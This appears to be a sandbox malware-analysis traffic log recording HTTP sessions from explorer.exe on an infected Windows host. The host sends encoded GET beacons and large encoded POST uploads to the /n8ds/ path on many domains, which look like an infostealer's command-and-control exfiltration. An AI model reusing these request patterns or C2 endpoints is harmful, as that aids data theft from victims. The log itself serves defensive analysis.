Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.11.20 | 49835 | 192.64.119.254 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:34.716861010 CET | 6645 | OUT | GET /n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs HTTP/1.1
                                                                                                                                                    Host: www.yghdlhax.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:10:34.878040075 CET | 6696 | IN | HTTP/1.1 302 Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:34 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 40
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: http://porn-x.org
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 70 6f 72 6e 2d 78 2e 6f 72 67 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                    Data Ascii: <a href='http://porn-x.org'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.11.20 | 49836 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:39.924544096 CET | 6744 | OUT | POST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.littlefishth.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.littlefishth.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.littlefishth.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
Nov 29, 2021 14:10:40.095241070 CET | 6876 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:40 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YF+BBr7CMwSU8Id/gSrcawEK3jT1i+cFrUEEtKs65nRY4jPgxIf7A2WuKrcmcnLVoJ8TlrGqTALUVzCaC6KScA
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.11.20 | 49837 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:39.935796022 CET | 6759 | OUT | GET /n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs HTTP/1.1
                                                                                                                                                    Host: www.littlefishth.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:10:40.043905020 CET | 6875 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:39 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "618be735-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.11.20 | 49838 | 81.2.194.128 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:50.261581898 CET | 6883 | OUT | POST /n8ds/ HTTP/1.1
Host: www.growebox.com
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.growebox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.growebox.com/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Nov 29, 2021 14:10:51.376867056 CET | 7010 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2021 13:10:51 GMT
Server: Apache
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /n8ds/on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.11.20 | 49839 | 81.2.194.128 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:50.289401054 CET | 6917 | OUT | GET /n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs HTTP/1.1
Host: www.growebox.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:10:51.388405085 CET | 7012 | IN | HTTP/1.1 200 OK
Date: Mon, 29 Nov 2021 13:10:51 GMT
Server: Apache
Content-Length: 3011
Connection: close
Content-Type: text/html
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>The domain name is registered</title><meta name="robots" content="noindex, nofollow"><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta name="description" content="FORPSI je Evropsk housingov spolenost. Nabz sluby webhostingu, serverhostingu, registrace domnovch jmen a www strnky na serverech Windows/Linux."><meta name="keywords" content="forpsi,webhosting,domna,domny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains"><style type="text/css">...html, body {margin: 0px;padding: 0px;height: 100%;background-color: #32549c;}#container {height: 100%;width: 100%;text-align: center;}#box {width: 520px;position: relative;margin: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;background-image: url(img/logo_forpsi.gif);background-repeat: no-repeat;background-position: left top;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#box2 {width: 520px;position: relative;margin:
Nov 29, 2021 14:10:51.388493061 CET | 7013 | IN
                                                                                                                                                    Data Ascii: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#flag {position: absolute;left: 95px;top
Nov 29, 2021 14:10:51.388549089 CET | 7014 | IN
                                                                                                                                                    Data Ascii: acute;NA JE ZAREGISTROV&Aacute;NA</td> </tr> <tr> <td><img src="img/flagSk.png" /></td> <td class="txt">DOM&Eacute;NA JE ZAREGISTROVAN&Aacute;</td> </tr> <tr> <td><img src="img/flagPol.gif" /></td> <td class="tx


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.11.20 | 49840 | 172.67.201.232 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:00.925525904 CET | 7020 | OUT | POST /n8ds/ HTTP/1.1
Host: www.topwowshopping.store
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.topwowshopping.store
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.topwowshopping.store/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Nov 29, 2021 14:11:01.255264997 CET    7153    IN    HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:01 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    expires: 0
                                                                                                                                                    last-modified: Mon, 29 Nov 2021 13:11:01 GMT
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P0nVeigE4yxlGLcZ5Cxy5N91cTSPfrIg%2FVBMIW1SjcGx9OD53wnMYSbR8VKLLjqeFjkuipPEIcScImvIaaIOy8M%2BP1%2BRZaWKEdpz7vmy8clGX3Nf5JHrz6yp4cRvSm24rrPBfVHNUl0nerg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6b5c1456cb616916-FRA
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                    Data Raw: 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 32 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 00 00 ff ff 03 00 92 54 0e 5c 0d 00 00 00 0d 0a
                                                                                                                                                    Data Ascii: 27210Q/Qp/KT\
Nov 29, 2021 14:11:01.255346060 CET    7153    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
29    192.168.11.20    49841    172.67.201.232    80    C:\Windows\explorer.exe
Timestamp    kBytes transferred    Direction    Data
Nov 29, 2021 14:11:00.935765028 CET    7055    OUT    GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDs HTTP/1.1
                                                                                                                                                    Host: www.topwowshopping.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:11:01.106746912 CET    7151    IN    HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:01 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    expires: 0
                                                                                                                                                    last-modified: Mon, 29 Nov 2021 13:11:01 GMT
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VxbqNNAHRhgi3pBNdK8WWqcOQjiYdxJ5FzwnhvoKea0z6d8rOaIAkM7vyOFdByvTmqxDIjDEY0Emdr5zM5kbzygexNo1c6NNYXcJC6kkHEGojM6tc1w1%2Bu9mgsyq18EZdLjtLU5rwZ9oWps%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6b5c1456dbd92bca-FRA
                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a
                                                                                                                                                    Data Ascii: d404 Not Found
Nov 29, 2021 14:11:01.106873989 CET    7151    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
3    192.168.11.20    49812    50.62.172.157    80    C:\Windows\explorer.exe
Timestamp    kBytes transferred    Direction    Data
Nov 29, 2021 14:06:54.561465979 CET    6401    OUT    GET /n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.diggingquartz.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:06:55.234136105 CET    6401    IN    HTTP/1.0 400 Bad request
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
30    192.168.11.20    49843    66.29.140.185    80    C:\Windows\explorer.exe
Timestamp    kBytes transferred    Direction    Data
Nov 29, 2021 14:11:06.294732094 CET    7204    OUT    POST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.lopsrental.lease
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.lopsrental.lease
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.lopsrental.lease/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
Nov 29, 2021 14:11:07.106406927 CET | 7464 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.11.20 | 49844 | 66.29.140.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:06.454262972 CET | 7342 | OUT | GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDs HTTP/1.1
Host: www.lopsrental.lease
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:11:06.707664967 CET | 7423 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.11.20 | 49846 | 216.172.172.87 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:16.894920111 CET | 7647 | OUT | POST /n8ds/ HTTP/1.1
Host: www.dietatrintadias.com
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.dietatrintadias.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dietatrintadias.com/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
8EVHWI1Hcggf-9Eb87u17uR3TLRknCDMmn0akvplZus0VhdT1Lb0k241PVtZgZlSHGP8WVEQyGODZES6S6Am9NQbW9scyy3Ai5UeHZgN3McictIgfjGzLDFhmgZJFizSKSFG4M5mSJkrQsbc8HQGCHWQtzJgRBROMjdO-kLnfikOUcwbhAgn02qx_FTve(LPep7go~dmAS2Jjt0XRFv5j3UggJa5aRXz7arMKBt~uaJjyPfFU3Pue0pyyMrXSMlllW74iTgWmAopggvT7Lh5bbsRzcdxHxSFjM2aQNFfgh2LSo1j39onedCEfQKBJWSA72zMrznjgZ3uSyScM4TVd7QJT2bSoLAEIpQaErLjTA9KIZZX2qr4-p7fF6MNzKokZM3ZF5q1k4XxvvCxBlb4KbRYACjtb2GaALUW9LIiGpHfodOypQ0eQ6C(WBdhX9u9S2QY97kvZad5dNkk_vR9JsVVW5HIL~_vMs4uKlI3wM8vpRa4pvDkIcdq2L8Kk6-7SU0WzbVdgMLLlYhDqyVpM396GJ9vhtrBNE7SjsPCZJJpDMzvvxV86eK(5443YmmzxFwi3~tq_ML1QnWigROgSBNtFx1ivEF2XCHUd0E6iNZxtWeINlflqCVdQsSWi~7Ulv5GUAIgcftE_vaTsMj6PCgFH~XeC(7GeVAZFdWfI(7en9MldXiwBEI4RWBLpT2jyrm2DrdyoaFxlQ8oXCW65pjvf3UOaWyXK(IZ_GiSq5Uzn(nu2kwg0DmJ8p79h8LqX~qdFrbHKa4RZt7CkV4y3QuSlQ8VTdY44d9ToA0eBcto4CF6c9hhCO5W9suuU0E12ckMqI7T5HfFu7J9UqEjBcA8NHLQgd9Cl8FbIfIKzP_28S1Xa5ak_taU0eGhW5N8LudMQm_4E8IBF~w8ytu43bShVGA(DFMW_f74kE1A6BPIBci3ZFvKVlfFNk4lFcJRDWVoh8AeCzLrk2fv0OITZvTxmSg8HkSL6mfH7wWDjb_P2Ak(EBM0IXTl9w74SXTC7Q4E4P_dPxn8E~BVEz1xOMNLQUM8yWE1IFOyfJv9lLTMQJu4yGFTM8ubFDdt28_1XzBZsK9zWuYo2DxmG3wxrkfh7THEhqAp5wRWS00YKK3mq6EiKpZMHDxokwd00dCkgMyJTIElqGU2gWe2w~JA0~p1t97pMQF75whWNr6ZCbcFGl4oI3HtTz_X6UAq0DamHbVteIzKxDysHho8KRNcME_zUY2oua8qS2-PPJpa-noz8El~_ZzTVuLKa8y53pfE5ezjZZ-7evzqhG0PJs7mJkMp0QQJG34uq64NmIdFGJum8k0kIUtqYqzsgoKISnj4YPNQcDmYRTRdDh6wH8639dk1dA7PcHatIH8AGNHgynxLbsKGwX-~xrDPLbloEYfdK(lTF1SHQrkIpRfI81URgU7xVXutrPvl4E0WHfIgRieXeZqr6Ioz_yK2INKuFgjVUky3ST3PIY-Sx(TDUHvxFdUiNugpB0PG1QVfhAmEXTS70l5VQo0apfqTl4ic1J8xhQB3BVcJ7Tll0~an47glalmqEUAM_eAFSQQGAAQxV9nfmYW9nQIST8Q(0gfVVeA9k48IJxD7N8uNp8fRyML52t696yplSH3h8r6zXlLHcSFjhkw0DdhYi6iQXaFRaKj3yTNASy6nzSdiCoJG6L7A24PQkMeQemsQ3yj81UewIgrZLBjXbfBmdE4tJDfj-rmTbYkl-JkSRcPtr41(9Ef2X9L0ErafsWkoTye53LQi8t_me4-m4R-LJoojRIzaySfTs5m~DQ1Q3KdjZ~1wQkthSxvBmmzieMhYeIVz1rfADEsyF0FLUooAeXflvYKSLHpGdZu0Azn~9gKNnnZBzLDal1mROYYmXkKxVeHEM7MIiK6~PS6YL3GTSNFQIdTGD(WCGPQlcOOl21x58y7pbSHpbpAjkXbz-8FvHj0cpdn8BVFpS25tKjESRm-YOlV7eW_tv8y8h~pYYzpKYTj4
U0JoW7LN5ui8MdP5LQpTtpJ4XKZLwz2mDEKCaXXia2GvYsPDA9tOp9XaaO8H0mI7YootOlSqVn3qusmOgu2DC2apRmenWkmk7E6YUvHSKQTdzSf3gBrlEl2F9Ny0oU6XPFizX9kshjjo5l1g_pVmfz_WdseYp1tUijZCGKluc3mdZTwZ-5S(ClyovWXJ0zi7sSlyO~rG98e4mlPwmPwXF0SejYAYYh3v9gaW-uTm1BPUKityarU2Bg
                                                                                                                                                    Nov 29, 2021 14:11:16.895016909 CET7653OUTData Raw: 67 33 33 58 56 64 4e 46 39 44 35 5a 6b 57 78 68 4b 39 5f 49 49 44 4a 38 32 34 76 6b 4e 47 68 67 4b 52 6c 39 4d 4a 67 36 38 71 44 7e 64 6c 45 78 4b 79 49 75 6e 71 62 4f 51 50 44 56 56 32 32 7a 75 7e 62 43 2d 77 73 78 57 38 65 6b 42 6e 69 69 37 42
                                                                                                                                                    Data Ascii: g33XVdNF9D5ZkWxhK9_IIDJ824vkNGhgKRl9MJg68qD~dlExKyIunqbOQPDVV22zu~bC-wsxW8ekBnii7BStQu-zRYzDVUN2wBZglCadB2yKkvPIGZMXon1tkIkoPeMIXUddX9rIXy-zZUpyBltOkGjU40C~-EGLGiEkmFhJkhBcCxB86uA9UBtscxFMH2p9Ntm2A(dy7(3mmXybSWNJgAcLYtnd_RmdVRiIsE_8KdVDMAuu60T
                                                                                                                                                    Nov 29, 2021 14:11:17.038265944 CET7663OUTData Raw: 43 46 79 30 67 6d 68 76 43 35 49 31 55 70 78 50 53 54 6c 44 71 63 33 73 72 4b 55 52 39 6f 4a 57 75 4b 4c 70 74 4c 68 33 75 6e 6e 4a 72 4f 65 6c 45 4f 4f 51 4a 4b 64 68 6f 79 6b 74 5f 69 37 63 4e 79 73 31 4e 68 31 30 5a 56 41 38 59 32 75 57 68 31
                                                                                                                                                    Data Ascii: CFy0gmhvC5I1UpxPSTlDqc3srKUR9oJWuKLptLh3unnJrOelEOOQJKdhoykt_i7cNys1Nh10ZVA8Y2uWh1gZpAQ1D~yEzNc6pMmaq8PxPoHROE2pe(OoaYHgoCIDxQwkZ~estybaG2IwADVCO8GCBBfEzDCoMBE4Xin4TE9V1CHn2rLtd2Ya0aTQ9ccDIXcI5hF1fuebCjgjVTgmLSiQrC7T7Aic8I02Sniyhu0q7ECvtynWAOT
                                                                                                                                                    Nov 29, 2021 14:11:17.038408995 CET7664OUTData Raw: 62 64 65 38 57 6c 33 6e 46 4a 53 72 4d 34 31 66 6c 35 57 73 71 34 66 31 61 79 69 48 74 47 5f 4b 57 6c 39 39 6b 6a 4e 64 34 51 41 36 6b 46 4a 71 44 6c 79 6f 6f 6e 69 52 49 59 68 77 4d 38 33 4a 45 51 2d 34 64 72 6f 73 48 63 67 72 45 50 55 4b 30 37
                                                                                                                                                    Data Ascii: bde8Wl3nFJSrM41fl5Wsq4f1ayiHtG_KWl99kjNd4QA6kFJqDlyooniRIYhwM83JEQ-4drosHcgrEPUK076G26-i3lo45Y9YLwRpH5v2GOi0PuDkDWaTUVYmr50DoHcBPKed88wu4MV2j9TI5AGZ2bsqQQMpkMPaUk2z_cW8aFeAng1sEL1AMZIW0CLLNmioNolE-0Px-XBWLjb4OVy6pXjJOtsph53vuzv7u(2J9kRliqsUY3I
                                                                                                                                                    Nov 29, 2021 14:11:17.042115927 CET7680OUTData Raw: 55 4d 32 53 30 7e 34 38 75 71 30 41 70 4a 78 65 35 4c 69 36 66 74 36 51 6a 44 42 54 45 56 58 35 2d 62 53 49 35 78 69 6b 44 54 62 52 74 28 78 47 77 61 44 4c 37 59 37 66 77 56 74 6a 6b 79 46 69 4d 45 5a 45 34 35 72 7a 73 6e 79 70 75 4e 43 55 6c 59
                                                                                                                                                    Data Ascii: UM2S0~48uq0ApJxe5Li6ft6QjDBTEVX5-bSI5xikDTbRt(xGwaDL7Y7fwVtjkyFiMEZE45rzsnypuNCUlYnZ1x-5veKgr~5JRfCVxiuI823HX(tS7E245Zl001HYKO6xZfMXTmS7XQQQ8btAToepNWxuyza8PS4wY9YOTVneVqBz_UvgYzZPkUwFpR9xM8_LY9oT22e8NIfzlyS3wf0Q-kLeisxKWWuWC3n29~x8YvObMG2dNP9
                                                                                                                                                    Nov 29, 2021 14:11:17.180354118 CET7683OUTData Raw: 6f 65 38 75 67 66 44 52 77 43 31 38 65 41 41 7e 34 64 6f 39 58 76 6a 36 76 7a 69 74 7a 76 62 4a 6a 52 5f 35 54 38 45 54 37 53 76 73 2d 6c 34 35 42 39 36 43 70 76 38 32 52 63 63 6c 32 6b 32 31 79 65 56 56 32 56 54 77 4e 55 44 35 6a 45 38 58 4a 4a
                                                                                                                                                    Data Ascii: oe8ugfDRwC18eAA~4do9Xvj6vzitzvbJjR_5T8ET7Svs-l45B96Cpv82Rccl2k21yeVV2VTwNUD5jE8XJJM5m0aqn2fVcGzV7ZCPrh7hnZjQdTOFB~GrflbF5JDPb9LL_C1phosRxcqnscqhrY-Pr0QfDKZxMnqPRLrm4ghDCi5hjsxF5NF~zsQZjhFrWcRCrM8gPkztzv7CahTqQLKYufMBNNKD7BrvuQDEYEuPDYU0LLY2Qij
                                                                                                                                                    Nov 29, 2021 14:11:17.180480957 CET7696OUTData Raw: 68 6a 50 52 65 54 39 45 55 46 39 48 76 45 67 77 54 48 5a 39 6d 4c 54 32 44 65 78 75 56 44 6d 56 50 68 69 48 51 7e 56 34 32 33 5a 72 68 79 70 50 54 47 56 62 48 47 44 4b 4f 56 48 75 4e 4d 5f 73 4c 4d 6a 54 36 50 69 70 70 46 47 69 4d 6a 4d 65 69 36
                                                                                                                                                    Data Ascii: hjPReT9EUF9HvEgwTHZ9mLT2DexuVDmVPhiHQ~V423ZrhypPTGVbHGDKOVHuNM_sLMjT6PippFGiMjMei6MjoRKrkhSz0DtjrXgBOmTDxr2LQEQ3FO67Ru8(GeyUfKqmlLwUALt0Hkq4O0B4MfuTrMB0jY-inh6K2eQ5NjDJT33O2(fXswvR-6pyhvH931RleWMUkaBSq6srrvIIhVaZHwzwnso9VECtAfafwYZqA(SvpLUmfcr
